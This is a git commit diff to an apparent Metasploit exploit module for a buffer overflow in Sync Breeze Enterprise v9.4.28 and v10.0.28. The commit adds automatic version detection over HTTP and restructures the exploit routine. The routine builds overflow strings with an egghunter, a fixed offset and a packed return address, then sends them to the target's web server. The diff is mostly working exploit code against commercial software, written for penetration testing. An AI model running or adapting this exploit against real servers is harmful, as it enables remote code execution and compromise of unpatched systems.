Support automatic targeting

wchen-r7 · wchen-r7 · commit 3a2c6128be58 · 2017-10-13T16:53:22.000-05:00
diff --git a/modules/exploits/windows/http/syncbreeze_bof.rb b/modules/exploits/windows/http/syncbreeze_bof.rb
@@ -39,6 +39,9 @@ def initialize(info = {})
         },
       'Targets'        =>
         [
+          [
+            'Automatic', {}
+          ],
           [ 'Sync Breeze Enterprise v9.4.28',
             {
               'Offset' => 2488,
@@ -57,34 +60,58 @@ def initialize(info = {})
       'DefaultTarget'  => 0))
   end
 
-  def check
+  def get_product_name
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => '/'
     )
 
     if res && res.code == 200
-      version = res.body[/Sync Breeze Enterprise v[^<]*/]
-      if version
-        vprint_status("Version detected: #{version}")
-        if version =~ /9\.4\.28/ or version =~ /10\.0\.28/
-          return Exploit::CheckCode::Appears
-        end
-        return Exploit::CheckCode::Detected
-      end
-    else
-      vprint_error('Unable to determine due to a HTTP connection timeout')
-      return Exploit::CheckCode::Unknown
+      product_name = res.body.scan(/(Sync Breeze Enterprise v[^<]*)/i).flatten.first
+      return product_name if product_name
+    end
+
+    nil
+  end
+
+  def check
+    product_name = get_product_name
+    return Exploit::CheckCode::Unknown unless product_name
+
+    if product_name =~ /9\.4\.28/ || product_name =~ /10\.0\.28/
+      return Exploit::CheckCode::Appears
+    elsif product_name =~ /Sync Breeze Enterprise/
+      return Exploit::CheckCode::Detected
     end
 
     Exploit::CheckCode::Safe
   end
 
-  def exploit
+  def get_target_name
+    if target.name != 'Automatic'
+      print_status("Target manually set as #{target.name}")
+      return target
+    else
+      print_status('Automatically detecting target...')
+    end
 
-    case target.name
+    case get_product_name
+    when /9\.4\.28/
+      print_status('Target is 9.4.28')
+      return targets[1]
+    when /10\.0\.28/
+      print_status('Target is 10.0.28')
+      return targets[2]
+    else
+      nil
+    end
+  end
 
-    when 'Sync Breeze Enterprise v9.4.28'
+  def exploit
+    tmp_target = target
+    case get_target_name
+    when targets[1]
+      target = targets[1]
       eggoptions = {
         checksum: true,
         eggtag: rand_text_alpha(4, payload_badchars)
@@ -110,7 +137,8 @@ def exploit
         'uri'    => sploit
       )
 
-    when 'Sync Breeze Enterprise v10.0.28'
+    when targets[2]
+      target = targets[2]
       uri = "/login"
       sploit = rand_text_alpha(target['Offset'])
       sploit << [target.ret].pack('V')
@@ -128,6 +156,10 @@ def exploit
           'password' => "rawr"
         }
       )
+    else
+      print_error("Exploit not suitable for this target.")
     end
+  ensure
+    target = tmp_target
   end
 end
